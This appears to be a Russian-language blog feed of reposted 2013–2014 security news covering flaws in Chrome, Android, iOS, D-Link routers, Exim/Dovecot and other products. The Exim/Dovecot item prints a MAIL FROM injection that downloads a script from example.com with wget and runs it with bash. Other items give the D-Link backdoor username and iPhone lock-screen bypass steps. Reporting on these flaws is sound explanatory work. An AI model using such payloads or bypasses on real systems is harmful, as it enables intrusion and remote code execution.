Мне подарили

06:46 29.01.2014
Андрій Крупко опубликовал запись в сообщество Интересное для всех!

Google Chrome может прослушивать все разговоры пользователя

Как сообщил израильский эксперт по кибербезопасности Таль Атер (Tal Ater), популярный интернет-браузер Google Chrome содержит ряд уязвимостей, позволяющих злоумышленникам прослушивать все разговоры жертвы.

Дело в том, что ранее в этом году разработчики реализовали в браузере поддержку голосового ввода, используя который пользователи могут открывать различные сайты. В связи с этим, появилось много сайтов, предлагающих услуги по распознаванию речи.

Для того чтобы корректно различать слова пользователя, такие ресурсы запрашивают доступ к микрофону компьютера. Если доступ предоставлен, в браузере отображается красный индикатор, который сообщает пользователю о том, что его слушают.

В идеале, при закрытии браузера прослушивание должно прекращаться. Однако, как заявил Атер, данный функционал может использоваться злоумышленниками в собственных целях.

«Большинство сайтов, распознающих речь пользователя, используют безопасное соединение по HTTPS, однако это совсем не означает, что пользователь защищен, а только указывает на то, что владелец сайта потратил $5 на установку сертификата, — отмечает исследователь. – Когда пользователь предоставляет сайту доступ к микрофону, Chrome запоминает его выбор, и сможет предоставлять доступ к микрофону в будущем без запроса о разрешении. В этом нет ничего плохого до тех пор, пока индикатор сообщает, что браузер подключен к микрофону и слушает, а сайт не может прослушивать разговоры в фоновом окне, спрятанном от владельца компьютера».

По словам эксперта, дело в том, что не все пользователи обращают внимание на важную деталь – когда на сайте, способном распознавать речь, нажимается кнопка старта прослушивания, нет гарантии, что ресурс не запустил свой функционал во всплывающем скрытом окне. Это окно может бездействовать, пока открыт браузер, а как только Google Chrome будет закрыт, начинает запись разговоров пользователя без каких-либо запросов и разрешений.

Более того, даже если пользователь и заметил это всплывающее окно и закрыл его, есть вероятность того, что индикатор в браузере не будет отображать запись голоса пользователя, в то время, как все разговоры продолжат передаваться в Сеть.

Атер отмечает, что обнаружил возможность осуществления подобной атаки в сентябре прошлого года, когда работал над JavaScript –библиотекой распознавания речи «JavaScript Speech Recognition».

Он рассказал об обнаруженных уязвимостях разработчикам Google, которые пообещали устранить бреши и в ближайшее время выпустить обновление. Однако исправление уязвимостей так и не увидело свет, и на запрос Атера спустя 4 месяца в компании заявили, что проводят обсуждение с Консорциумом по WWW (World Wide Web Consortium), по поводу подходящего времени для релиза.

Эксперт отмечает, что обезопасить себя от слежки можно вручную, изменив настройки браузера. Сделать это можно так: Настройки-Показать расширенные настройки: Настройки содержимого: Запретить сайтам получать доступ к камере и микрофону.

http://www.bezpeka.com/ru/news/2014/01/27/chrome-is-listening.html

Метки: Google Chrome, прослушка, уязвимость
15:51 15.01.2014

Samsung отрицает наличие уязвимостей в своей платформе безопасности Knox

Google и Samsung объединили усилия для того, чтобы опровергнуть заявления израильских исследователей о наличие бреши в Galaxy S4.

Samsung не только не выпустила обновления безопасности, устраняющие уязвимость в платформе безопасности Knox — она заявила, что брешь вообще отсутствует. Напомним, что в прошлом месяце студент университета имени Давида Бен-Гуриона (Негев, Израиль) Мордехай Гури (Mordechai Guri) заявил, что во флагманском смартфоне Samsung Galaxy S4 якобы существует уязвимость, позволяющая отслеживать письма электронной почты и данные о звонках пользователя.

На прошлой неделе Samsung и Google объединили усилия для того, чтобы опровергнуть заявления израильских исследователей. Отметим, что платформа Knox разработана для хранения рабочих приложений и сопутствующих данных в отдельных отсеках. Именно благодаря ей Samsung намерена продвинуть свои устройства в правительственный сектор.

По словам экспертов Samsung и Google, Гури использовал легитимные сетевые функции Android непредусмотренным образом. Они признали, что подобная эксплуатация может привести к перехвату незашифрованных соединений с приложениями, однако не связывают это с наличием уязвимости ни в Android, ни в Knox.

«Это исследование не указывает на уязвимость в Samsung Knox или Android, а демонстрирует классическую атаку «человек посередине», позволяющую перехватить незашифрованные данные приложений, которая возможна в любой точке сети», — заявили эксперты технологических гигантов. Они также добавили, что атак, продемонстрированных Гури, можно избежать, если используемые приложения поддерживают SSL-шифрование.

По словам профессора Технологического института Джорджии (США) Патрика Трэйнора (Patrick Traynor), данный вопрос также можно решить путем надлежащей конфигурации механизмов, имеющихся в Knox.

http://www.bezpeka.com/ru/news/2014/01/15/samsung-denies-flaws-in-knox.html

Метки: Samsung, уязвимость, Knox, Galaxy S4
16:02 14.10.2013

В роутерах D-link выявлена серьезная уязвимость

Группа хакеров, специализирующаяся на встраиваемой электронике, обнаружила уязвимость в популярных домашних роутерах D-Link, при помощи которой к управлению устройством может быть допущен неавторизованный пользователь. Уязвимость, открывающая доступ к администраторскому веб-интерфейсу, позволяет котролировать ряд пользовательских функций в популярных роутерах DIR-100, DI-524, DI-524UP, DI-604S, DI-604UP, DI-604+ и TM-G5240. Согласно сообщению ресурса /dev/ttys0, несколько роутеров модельного ряда Planex также уязвимы, так как они применяют такую же системную прошивку.

В сообщении говорится, что для того, чтобы получить доступ к управлению роутером без пароля пользователю нужно открыть окно авторизации и ввести в графе имени пользователя последовательность xmlset_roodkcableoj28840ybtide, при этом пароль можно уже не вводить — роутер пустит с таким именем и без него.

Специалисты говорят, что так называемый User Agent в мини-сервере роутера использует простейший алгоритм последовательностей для предоставления или отказа в авторизации. Так, если вводимая последовательность вызывает функцию check_login и та либо пропускает функцию alpha_auth_check, либо возвращает параметр 1, то роутер пускает в интерфейс управления и без ввода пароля.

Пользователи /dev/ttys0 расходятся во мнении является ли столь слабая реализация грубой недоработкой D-Link или же это намеренно созданный инженерный бэкдор. Также разработчики ресурса говорят, что ими уже был создан эксплоит против данного бага.

http://www.bezpeka.com/ru/news/2013/10/14/D-link-flaw.html

Метки: D-link, уязвимость, роутер
19:23 30.09.2013

В iOS 7.0.2 обнаружена опасная уязвимость

На прошлой неделе разработчики Apple выпустили обновление мобильной операционной системы iOS 7, устранявшее уязвимость, эксплуатируя которую можно было обойти экран блокировки устройства и получить доступ к конфиденциальным данным владельца.

Спустя несколько дней после релиза обновления, хакеры обнаружили в нем подобную брешь и выложили подробную инструкцию взлома на YouTube.

На этот раз обойти экран блокировки можно при помощи голосового помощника Siri, службы видеозвонков FaceTime и ряда несложных манипуляций.

В настоящий момент нет сведений о том, известно ли сотрудникам Apple о новой уязвимости и когда будет выпущен следующий пакет обновлений.

http://www.bezpeka.com/ru/news/2013/09/30/ios7-flaw.html

Метки: пароль, уязвимость, блокировка, IOS 7
19:57 20.09.2013

Новая уязвимость в iOS 7 даёт неавторизованный доступ к устройству

Забудьте про споры о безопасности сканера отпечатков пальцев! Оказывается, доступ к iPhone можно получить вообще без всякой авторизации.

Испанский хакер Хосе Родригес (Jose Rodriguez) обнаружил уязвимость, которая открывает фотографии, почту, твиттер и проч. в обход экрана блокировки. Автор рассказал подробности взлома, а также опубликовал видео.

Для эксплуатации бага нужно сдвинуть экран для доступа к центру управления и запустить будильник. Если удерживать кнопку Sleep, то появится опция выключить будильник. Вместо этого нужно нажать Cancel и дважды кликнуть кнопку Home, чтобы получить доступ к меню. А там уже куда угодно — можно читать почту, писать сообщения в твиттер, посмотреть личные фотографии, опубликовать их в социальных сетях и т.д.

Метод проверили на iPhone 5 с iOS 7, но он должен срабатывать и на новых iPhone 5S и 5C. Защититься от этого эксплойта можно с помощью настроек центра управления iOS 7.

Родригес уже находил способы обхода блокировки экрана в iOS 6.1.3 и iOS 7 beta, это третий его трофей. С момента выхода iOS 7 закрыто 80 уязвимостей, но новые продолжают находить.

http://www.bezpeka.com/ru/news/2013/09/20/ios-7-bug-lets-anyone-bypass-iphones-lockscreen.html

Метки: уязвимость, IOS 7, неавторизованный доступ
18:15 05.09.2013
Андрій Крупко опубликовал запись в сообщество Интересное для всех!

Найдена уязвимость в Android-приложении "Приват24"

Разработчик Алексей Мохов, бывший сотрудник украинского Samsung и Viewdle, сообщил о серьезной уязвимости, найденной в Android-приложении онлайн-банкинга "Приват24".

Суть уязвимости – в получении доступа к конфиденциальным данным пользователя, который авторизовался в приложении. Приложение "Приват24" обменивается данными с банком и все данные пересылаются в зашифрованном виде. Но если на телефоне установлено приложение, которое "знает" протокол общения с банком, то оно может получить всю информацию от банка, не зная даже телефона/пароля в "Приват24".

То есть, банк думает, что обменивается данными со своим приложением, как рассказал Алексей.

Технически это реализовывается как запрос от приложения к банку, содержащий некоторые параметры (appkey (секретный ключ приложения), IMEI (не стандартный IMEI, специальный приватовский идентификатор) и еще некоторые параметры, которые здесь не указаны специально.

"В свое или чужое приложение, которое пользователь должен установить на телефон, можно вставить эти запросы с параметрами и получать ответы от банка. Только пользователь должен перед этим войти в приложение "Приват24", – поясняет Алексей.

Проблема еще и в том, что подобный вредоносный код у себя в приложениях сможет обнаружить только пользователь, очень подкованный технически. Еще одна уловка, которая может здесь сработать: чтобы не высылать постоянно запросы в банк от вредоносного приложения (проверять, прошел ли авторизацию человек) хакер может воспользоваться разрешением для приложения в ОС Android.

Если во вредоносном приложении будет такое разрешение, то оно сможет определить, что пользователь запустил "Приват24" и будет ожидать процесса авторизации.

По словам Алексея, уязвимость удалось обнаружить, когда во время работы над технологией оплаты в приватовском терминале самообслуживания для сервиса такси разработчик начал изучать API-документацию банка и затем полностью декомпилировал код его Android-приложения.

"В целом, безопасность приложения – на хорошем уровне, но такая уязвимость была найдена", – говорит он. Update.

В "ПриватБанке" сообщили об устранении уязвимости: "Два мошеннических приложения Мохова были оперативно выявлены. На сегодняшний день система безопасности Приват24 Android усилена. Система без проблем умеет отличать вход клиента в аккаунт от попытки вмешательства постороннего приложения, маскирующегося под оригинальное".

http://www.bezpeka.com/ru/news/2013/09/05/privat24-viln.html

Метки: Приват24, уязвимость
14:20 08.08.2013

Уязвимость в Google Chrome позволяет получить неограниченный доступ к паролям пользователей

В браузере Google Chrome была обнаружена серьезная уязвимость, благодаря которой любой пользователь компьютера может просмотреть пароли владельца ПК: к электронной почте, социальным сетям и пр., непосредственно с панели настроек web-обозревателя. При этом для их просмотра вводить мастер-пароль не нужно.

Для просмотра паролей необходимо нажать на кнопку «Настройки», зайти в раздел «Показать дополнительные настройки», а затем – «Управление сохраненными паролями» в разделе «Пароли и формы». В отдельном диалоговом окне откроется список сохраненных паролей. Примечательно, что вначале пароли скрыты, однако при нажатии на кнопку «Показать» вместо точек отображается текстовый вариант пароля, который можно копировать и всячески использовать.

Руководитель команды разработчиков web-обозревателя Джастин Шух (Justin Schuh) сообщил, что ему было известно о существовании данной бреши, однако он не планировал ее устранять. Это заявление возмутило Тима Бернерса-Ли (Tim Berners-Lee), изобретателя Всемирной паутины.

В своем блоге в Twitter британский ученый написал : «как заполучить все пароли старшей сестры… и разочаровывающая реакция команды Chrome».

Эллиотт Кембер (Elliott Kember), обнаруживший брешь, заявил: «В мире, где Google рекламирует свой браузер на YouTube, в анонсах кино и на билбордах, чистая аудитория обозревателя – это не разработчики, а пользователи. Подавляющее большинство. Они не знают принципа работы. Они не ожидают, что пароли можно просмотреть так легко. Каждый день, миллионы обычных пользователей сохраняют свои пароли в Chrome. Так не должно быть».

Отметим, что Google Chrome входит в тройку лидеров среди web-обозревателей. Первые позиции занимают Internet Explorer от Microsoft и Mozilla Firefox. У них были обнаружены подобные уязвимости, однако компании сразу же выпустили исправления.

В блоге Hacker News Шух написал : «Нас неоднократно спрашивали, почему мы просто не внедрим поддержку мастер-пароля или чего-то в этом роде, даже если мы не верим, что он может работать. Мы обсуждали этот вопрос раз за разом и всегда приходили к выводу, что не хотим предоставлять пользователям чувство ложной безопасности и поощрять рискованное поведение. Мы хотим четко заявить, что, когда вы предоставляете кому-то доступ к своей учетной записи пользователя ОС, они могут получить доступ ко всему».

Несмотря на столь твердую позицию со стороны создателей Chrome, многие ИБ-эксперты очень возмущены подобным поведением. «Если вы можете просматривать пароли, это значит, что их можно расшифровать. Соответственно, злоумышленники могут разработать троян для похищения этих паролей, не уведомляя об этом пользователей», — возмутился менеджер отдела ИТ-безопасности одного из издательств.

http://www.bezpeka.com/ru/news/2013/08/08/flaw-in-Google-Chrome.html

Метки: Google Chrome, пароль, уязвимость
17:48 07.08.2013

Хакеры начали использовать уязвимость с мастер-ключом Android

ИТ-специалисты обнаружили еще одно вредоносное приложение, эксплуатирующее критическую уязвимость в операционной системе Android и позволяющее организаторам атак встраивать вредоносный код в приложение, не изменяя цифровой подписи самого приложения. Впервые новая вредоносная техника была обнаружена в Android-приложении крупнейшего южнокорейского банка NH Nonghyup Bank при помощи систем мониторинга японской антивирусной компании Trend Micro.

В Trend Micro говорят, что в оригинальной версии банковского приложения никаких вредоносов нет, но в обновлении они уже есть. Издатели "обновления" использовали для реализации задумки ранее появившуюся уязвимость, связанную с так называемым мастер-ключом Android. За счет наличия мастер-ключа операционная система в любом случае пропускает приложение, хотя его вторичная подпись уже была нарушена. На практике такой подход открывает для злоумышленников новые методы по проникновению к пользовательским данным и компрометации устройств.

В Google обещают закрыть уязвимость с мастер-ключом уже в следующем обновлении Android.

http://www.bezpeka.com/ru/news/2013/08/07/hackers-exploit-master-key-flaw.html

Метки: хакеры, Android, уязвимость, мастер-ключ
20:03 02.08.2013

В протоколе HTTPS обнаружена серьезная уязвимость

Криптографическая схема HTTPS, используемая для защиты миллионов сайтов по всему миру, подвержена новому типу атак, позволяющих хакерам получать пользовательские адреса электронной почты и банковские платежные реквизиты из зашифрованных страниц.

В ряде случаев на реализацию атаки уходит всего 30 секунд. Ожидается, что подробно о новой технике будет рассказано сегодня на конференции Black Hat в Лас-Вегасе.

Авторы методики говорят, что атака позволяет декодировать закрытые данные, которые системы онлайн-банкинга и платформы электронной коммерции передают в ответ клиентам по протоколам TLS (Transport Layer Protocol) и SSL (Secure Sockets Layer).

По словам авторов методики, атака позволяет вскрывать определенные типы данных, такие как номера социального страхования, электронные адреса, некоторые типы электронных ключей, а также ссылки на сброс паролей. Работает атака против всех версий TLS и SSL, независимо от того, какой именно алгоритм или шифр используется. Новый тип атаки требует, чтобы у атакующего был пассивный доступ к трафику между пользователем и веб-сайтом. Кроме того атака требует, чтобы атакующий вынудил жертву нажать на вредоносную ссылку. Сделать это можно через iframe или через скрытое изображение со ссылкой в тексте страницы или письма.

Авторы говорят, что они не дешифруют весь канал HTTP, а лишь вскрывают те данные, что им необходимы. "Нам нужно найти лишь кусок данных, это может быть ключ, запрос на изменение пароля. В общем, вскрыть можно практически любой ответ через страницу или Ajax-код", — говорит Джоэль Глук, один из автором методики.

http://www.bezpeka.com/ru/news/2013/08/02/https-flaw.html

Метки: протокол, уязвимость, HTTPS
14:14 01.08.2013

Уязвимость в GPS позволяет угонять корабли и самолеты

Доцент инженерной школы Кокрелла (Cockrell School of Engineering) при Университете Техаса Тодд Хамфрис (Todd Humphreys) совместно со студенческой исследовательской командой обнаружил, что при помощи сравнительно недорогих инструментов, эксплуатируя уязвимость в GPS, можно угонять корабли и самолеты.

Исследователи продемонстрировали свое открытие на примере яхты класса люкс «White Rose of Drachs» длиной 65 м и стоимостью $80 млн, во время круиза по Средиземному морю. Эксперты использовали ноутбук, антенну и специально разработанный GPS-спуфер, который обошелся всего в $3 тыс., для создания ложного GPS-сигнала. Экипаж судна принял этот сигнал за настоящий и использовал для навигации, что привело к отклонению яхты от ее первоначального курса.

«Мы получили практически полный контроль над навигационной системой судна», — рассказал Хамфрис телеканалу Fox News.

Капитан «White Rose of Drachs» Эндрю Скофилд (Andrew Schofield) сообщил: «Профессор Хамфрис и его команда осуществили ряд атак, которые были совершенно незаметны для нас». Скофилд также отметил, что при смене курса система сигнализации не сработала. По словам Хамфриса, навигационные системы судов и коммерческих самолетов очень похожи, поэтому такие же атаки могут осуществляться и по отношению к последним.

http://www.bezpeka.com/ru/news/2013/07/31/gps-hacking.html

Метки: GPS, атака, уязвимость, система навигации, Тодд Хамфрис
14:22 31.07.2013

ISC: Зафиксированы атаки с использованием связки Exim и Dovecot

Эксперты Центра противодействия угрозам в Сети (Internet Storm Center, ISC) зафиксировали рост количества атак, совершенных посредством использования уязвимой конфигурации приложений Exim и Dovecot.

По окончанию атаки на сервер устанавливается perl-скрипт /tmp/p.pl, который на подобие IRC-серверов обрабатывает определенные управляющие команды. В случае использования Exim в качестве почтового сервера, его можно настроить на перенаправление сообщений во внешнюю программу с целью расширить возможности фильтрации и доставки email. Обычная конфигурация содержит агент по доставке писем Dovecot, который поддерживает работу серверов pop3 и imap.

Инфицирование сервера происходит посредством рассылки спам-писем. Они эксплуатируют уязвимость через заголовок Return-Path, обрабатывая который Exim запускает утилиту wget, загружает скрипт и запускает его.

Примером проведенной атаки можно назвать следующее. Так, в случае указания злоумышленником:

MAIL FROM: red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com

Exim выполнит:

/bin/sh -c "/usr/lib/Dovecot/deliver -e -k -s -f \"red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com"

Это, в свою очередь, приведет к запуску wget, загрузке внешнего скрипта c сайта example.com/test.sh и его выполнению.

Примечательно, что информация о брешах была опубликована еще в мае текущего года, однако до сих пор остается огромное количество уязвимых серверов. Пользователям связки Exim и Dovecot следует проверить настройки на предмет отсутствия опции «use_shell», с помощью которой Dovecot передает параметры в командную строку. Благодаря этому злоумышленники могут выполнять системные команды.

http://www.bezpeka.com/ru/news/2013/07/30/Dovecot-Exim-Exploit.html

Метки: уязвимость, ISC, Exim, Dovecot
08:11 30.07.2013
Андрій Крупко опубликовал запись в сообщество Интересное для всех!

При невыясненных обстоятельствах умер эксперт, обнаруживший смертоносные уязвимости в кардиостимуляторах

5 июля нынешнего года, в Сан-Франциско при невыясненных обстоятельствах скончался эксперт по безопасности Барнаби Джек (Barnaby Jack), известный своими открытиями уязвимостей в банкоматах и медицинских устройствах. Примечательно то, что исследователь скончался всего за несколько дней до конференции Black Hat, на которой должен был раскрыть уязвимости в медицинских имплантатах, способных повлечь за собой смерть человека.

При жизни 35-лентний Барнаби Джек работал директором отдела безопасности встроенных устройств компании IOActive, специализирующейся на безопасности промышленных и медицинских устройств. Представители IOActive пока не комментируют кончину Джека. Организаторы конференции Black Hat опубликовали заявление, выразив сожаление о безвременной смерти эксперта.

Барнаби Джек также работал в компаниях по безопасности McAfee и Juniper. Он известен своим выступлением на Black Hat три года назад, во время которого продемонстрировал, как, эксплуатируя уязвимости в банкоматах Triton и Tranax, можно получать деньги по требованию.

В октябре прошлого года на конференции по безопасности, проходившей в Мельбурне, Джек продемонстрировал, как беспроводные протоколы в современных кардиостимуляторах и других имплантатах могут использоваться злоумышленниками, чтобы вызвать смерть их владельцев. Эксперт представил видео, изображающее возможность послать с ноутбука на кардиостимулятор жертвы смертельный электрический разряд в 830 вольт, находясь при этом на расстоянии девяти метров.

Кроме того, Джек продемонстрировал, как инсулиновые помпы от поставщика медицинского оборудования Medtronic могут быть удаленно использованы злоумышленниками для введения смертельной дозы инсулина.

На конференции, которая состоится на этой неделе в Лас-Вегасе, Барнаби Джек должен был представить доклад «Имплантированные медицинские устройства: взломать человека» («Implantable Medical Devices: Hacking Humans»). В документе идет речь о том, как при помощи прикроватных мониторов (так называемых мониторов пациента) можно управлять индивидуальными медицинскими имплантатами человека на расстоянии около 91 метра.

http://www.bezpeka.com/ru/news/2013/07/29/Barnaby-Jack-died.html

Метки: уязвимость, имплантат, Барнаби Джек, Black Hat, кардиостимулятор, IOActive
16:15 23.07.2013

В Google Play обнаружились два приложения, использующих опасную уязвимость Android

Старший аналитик антивирусной компании Bitdefender Богдан Ботезату обнаружил в Google Play две игры, использующие потенциально опасную уязвимость для Android, самой популярной операционной системы для смартфонов и планшетов. Первую игру — Rose Wedding Cake Game — установили до 10 000 пользователей, вторую — Pirates Island Mahjong — до 50 000.

Причин для паники пока нет, пишет Ботезату в блоге: игрушки не делают ничего опасного. Они содержат по два файла формата PNG (компьютерный формат изображения) с одинаковым названием, это часть интерфейса обеих игр. При установке система проверяет сертификат одного изображения, а устанавливает второе. Скорее всего, это происходит по ошибке, считает Ботезату, но точно так же можно установить взамен известной игры или программы вредоносное приложение.

Первым об обнаруженной уязвимости в Android написал в начале июля Джефф Форристэл, технический директор компании Bluebox Security. «Дыру» назвали Master Key («ключ от всех дверей»), с ее помощью можно запустить на устройстве под управлением Android вместо легального приложения, подписанного цифровым сертификатом известного разработчика, вредоносную программу безо всякого сертификата. Описать уязвимость подробнее Форристэл пообещал на хакерской конференции BlackHat 1 августа. Но, не дожидаясь этого, суть проблемы описали разработчики альтернативной Android-прошивки CyanogenMod. Действует Master Key на устройствах под управлением Android начиная с версии 1.6 (четырехлетней давности).

Google уже выпустила программу-заплатку для Master Key, знает представитель антивирусной компании «Доктор Веб» Кирилл Леонов, но этого мало: нужно, чтобы такие же заплатки для конкретных телефонов и планшетов выпустили и сами их производители. Между тем производители обычно не выпускают обновления для старых моделей, выпущенных несколько лет назад. Поэтому, если злоумышленники возьмут Master Key на вооружение, от них может пострадать значительная часть пользователей Android-фонов, предупреждает Леонов.

http://www.bezpeka.com/ru/news/2013/07/23/apps-using-android-flaw.html

Метки: Android, приложения, уязвимость, Google Play
16:11 23.07.2013

Обнаружена опасная уязвимость в Java 7

Представители польской компании Security Explorations заявили об обнаружении новой уязвимости в Java 7, которая позволяет злоумышленнику обойти песочницу программного обеспечения и выполнить произвольный код на системе. Для подтверждения наличия бреши Адам Гоудиак (Adam Gowdiak), генеральный директор и основатель Security Explorations, отправил уведомление с PoC-кодом уязвимости в Oracle.

По словам исследователя, уязвимость присутствует в Reflection API – функции в Java 7. В Security Explorations подтвердили, что PoC-код эксплоита работает для Java SE 7 Update 25 и более ранних версий.

Гоудиак заявил, что обнаруженная уязвимость может позволить хакерам осуществить «классическую» атаку для поражения виртуальной машины Java, которая известна уже на протяжении 10 лет.

«Это один из тех рисков, от которого следует защищаться в первую очередь, при нововведениях в Java на уровне ядра виртуальной машины. Удивительно, что защита от такого типа атак не была реализована в Reflection API при разработке Java 7», — заявил эксперт.

По утверждениям исследователя, уязвимость позволяет злоумышленнику нарушить фундаментальные функции безопасности виртуальной машины Java.

«В результате атаки мошенник может вносить изменения в операции преобразования типа», — заявил Гоудиак. В Java операции подобного типа должны следовать строгим правилам для того, чтобы доступ к памяти осуществлялся безопасно.

Гоудиак раскритиковал Oracle за присутствие бреши в Java 7 и поднял вопрос об эффективности ПО компании, которое отвечает за обеспечение безопасности, и процедур проверки безопасности кода.

http://www.bezpeka.com/ru/news/2013/07/23/Java-7-flaw.html

Метки: Java, Oracle, уязвимость
13:55 11.07.2013

Уязвимость в Windows, публично раскрытая экспертом Google, эксплуатировалась хакерами

Согласно информационному агентству Reuters, уязвимость в Windows 7 и Windows 8, которую Microsoft устранила в июле нынешнего года, эксплуатировалась злоумышленниками для осуществления целевых атак. Компания не сообщила о масштабах атак и ущербе, который они нанесли.

Эксплуатации уязвимости способствовало то, что в мае 2013 года информация о ней была публично раскрыта исследователем Google Тэвисом Орманди (Tavis Ormandy). Примечательно то, что эксперт не уведомил о бреши саму компанию и тем самым подверг риску пользователей Windows. Орманди заявил, что сознательно решил не связываться с Microsoft, поскольку с сотрудниками очень сложно взаимодействовать из-за их враждебности.

Эксперт также посоветовал исследователям, обнаружившим уязвимости, при обращении к сотрудникам компании не называть своих настоящих имен, а пользоваться псевдонимами. Подробнее ознакомится с описанием уязвимости можно по адресу http://www.securitylab.ru/vulnerability/442235.php

http://www.bezpeka.com/ru/news/2013/07/11/disclosed-flaw-exploited.html

Метки: windows, Google, уязвимость, Тэвис Орманди
18:45 05.07.2013

Уязвимость в Android позволяет изменить код приложения, не повреждая его криптографическую подпись

Команда исследователей Bluebox Security Labs сообщила об уязвимости в модели обеспечения безопасности Android, позволяющей изменять код приложения .APK. Уязвимость использует несоответствие, которое допускается при модификации приложения, при этом не повреждая его криптографическую подпись. То есть, уязвимость позволяет обмануть Android, который не обнаружит изменений в приложении.

Эксплуатируя уязвимость, которая присутствует в версиях Android начиная с Android 1.6 "Donut", злоумышленники могут превращать любое подписанное приложение в троянское ПО для хищения данных или создания ботнета.

"Установка троянского ПО в приложение от производителя устройства может предоставить полный доступ к системе Android и всем установленным приложениям (или их данным)", — подчеркивают эксперты Bluebox Security Labs.

С помощью троянского приложения злоумышленники могут получать доступ не только к письмам электронной почты, SMS-сообщениям, документам и т.д., но также к учетным записям пользователя. Более того, измененное приложение может контролировать любую функцию мобильного устройства (произвольно совершать звонки и отправлять SMS-сообщения, включать камеру, записывать звонки).

Троянские приложения распространяются по электронной почте, а также загружаются с web-сайтов. Кроме того, используются сторонние репозитории приложений. По словам экспертов, через Google Play такие приложения не распространяются, поскольку Google обновила процесс записи приложения в магазин.

http://www.bezpeka.com/ru/news/2013/07/05/bluebox-uncovers-android-master-key.html

Метки: Android, ТРОЯН, уязвимость, приложение, Bluebox Security Labs
19:50 10.06.2013

Эмулятор клавиатуры для iPad позволяет осуществить брутфорс-атаку и подобрать пароль

Гаджеты производства компании Apple в последнее время все чаще становятся объектами исследования хакеров, которые пытаются обойти защиту и вторгнуться в экосистему, созданную разработчиками.

Так, французский хакер Пьер Дандюмон (Pierre Dandumont) обнаружил способ осуществления брутфорс-атаки на планшеты iPad, причем нападение удалось осуществить, несмотря на предусмотренный в гаджете механизм блокировки после нескольких попыток ввода пароля. Оказывается, что, несмотря на предусмотренную блокировку на 1 минуту, а затем на 5, 15 и 60 минут, уязвимость в настройках системы позволяет обойти защитный механизм.

Хакер установил, что при подключении карты Teensy 3.0, которая эмулирует клавиатуру, брутфорс экрана блокировки iOS осуществить все-же невозможно, однако защитный механизм не срабатывает при использовании устройства для снятия ограничений в настройках системы. Из-за существующей уязвимости таймер блокировки включается, однако защита не срабатывает и пароль можно определить методом подбора.

Видео http://www.youtube.com/watch?feature=player_embedded&v=C6md792nMhY

http://www.bezpeka.com/ru/news/2013/06/10/keyboard-emulator.html

Метки: iPad, Взлом, защита, пароль, уязвимость, брут-форс
18:33 10.06.2013
Андрій Крупко опубликовал запись в сообщество Интересное для всех!

Обнаружен способ взлома телевизоров Samsung с функцией SmartTV

Как сообщил в своем блоге немецкий исследователь Мартин Хельфурт (Martin Herfurt), ему удалось взломать телевизор Samsung с функцией SmartTV.

Эксперт отметил, что осуществил успешную кибератаку с удаленного компьютера на трансляцию программ по технологии HbbTV (Hybrid Broadcast Broadband TV), используемой в телевизорах Samsung.

После взлома системы ему удалось подменить трансляцию, получить возможность создания поддельных субтитров и даже генерировать валюту для пиринговой электронной платежной системы Bitcoin, а также осуществить другие несанкционированные действия.

По словам хакера, взлом удалось осуществить, поскольку телевизоры используют встроенный браузер WebKit версии 1.1 и JavaScript, в котором присутствует ряд неустраненных уязвимостей. Более того, Samsung не использует в своих телевизорах шифрования SSL, что значительно облегчает задачу хакерам и позволяет им подменять контент прямо во время трансляции.

http://www.bezpeka.com/ru/news/2013/06/10/hacking-SmartTV.html

Метки: Взлом, Samsung, уязвимость, SmartTV
06:07 22.05.2013

Обнаружены бреши в системе безопасности web-ресурсов Совета Европы

Как сообщил индийский хакер под ником Godzilla, ему удалось обнаружить несколько брешей в системе безопасности web-сайта Совета Европы, эксплуатируя которые киберпреступнику удалось получить привилегированный доступ к административной панели сайта, а также к материалам сертификационных курсов, включая CEH v8, CHFI v4, ECSS и ECSA/LPT 4.

Godzilla отмечает, что в случае, если обнаруженным способом воспользуются злоумышленники, они легко смогут получить доступ к стратегически важным информационным системам ведущих стран мира, так как их использует минобороны США, АНБ, ЦРУ НАСА и т.д.

По словам хакера, он указал ведомству на существующие бреши для того чтобы специалисты пересмотрели систему безопасности информационных ресурсов.

http://www.bezpeka.com/ru/news/2013/05/21/website-flaws.html

Метки: безопасность, уязвимость, Совет Европы
07:25 08.05.2013

Уязвимость в телефонном адаптере ATA позволяет похищать логины и пароли пользователей

Эксплуатируя уязвимость в аналоговом телефонном адаптере Analog Telephone Adapter (ATA), злоумышленники могут похищать логины и пароли SIP-протокола, что ставит под угрозу сотни тысяч пользователей.

Об этом сообщили эксперты компании TransNexus. Злоумышленники могут использовать похищенные учетные данные для массового мошенничества. По словам экспертов, обнаружить взлом крайне сложно, поскольку устройство продолжает функционировать, но теряет связь с сервером поставщика услуг.

Трудность также заключается в том, что в случае обнаружения атаки, вендор должен связаться с каждым пользователем, ставшим жертвой взлома, чтобы вернуть все первоначальные заводские настройки.

http://www.bezpeka.com/ru/news/2013/05/07/ata-flaw.html

Метки: адаптер, уязвимость, Analog Telephone Adapter, ATA, TransNexus
19:47 19.04.2013

В протоколе авторизации Facebook существует неустраненная уязвимость

Хакер под ником Nir Goldshlager снова обнаружил уязвимость в протоколе авторизации Facebook oAuth.

Так, после того, как Nir описал возможность взлома учетной записи пользователя соцсети даже без установки приложения и множественные способы обхода стандартных методов безопасности Facebook oAuth, на этот раз он решил описать сценарий новой атаки, рассказав, как манипулировать приложением, установленным в учетной записи жертвы.

Согласно сообщению исследователя, если жертва, к примеру, устанавливает Skype или Dropbox, злоумышленники могут получить доступ к ее учетной записи в Facebook. В этом случае киберпреступникам достаточно найти перенаправление / XSS на домене приложения, которое использует жертва (skype.com или dropbox.com).

Обнаружив брешь на сайте владельца приложения, злоумышленик при помощи access_token может похитить учетные данные жертвы.

По словам исследователя, в настоящий момент уязвимости в системе перенаправления являются очень распространенными, причем перенаправление можно обнаружить даже на субдоменах владельцев различных приложений. В то же время, эти бреши не подпадают под программы выплаты вознаграждения за их обнаружение. Nir также показал, что злоумышленники могут получать информацию о том, какие приложения используют жертвы. По словам исследователя, проблема в устранении подобных брешей состоит в том, что разработкой приложений для Facebook занимаются сторонние разработчики

http://fireku.narod2.ru/novini_t/

http://www.bezpeka.com/ru/news/2013/04/19/fb-flaw.html

Метки: Facebook, уязвимость, авторизация
05:43 16.02.2013

Разработчики Adobe Reader опубликовали инструкции по устранению критических уязвимостей

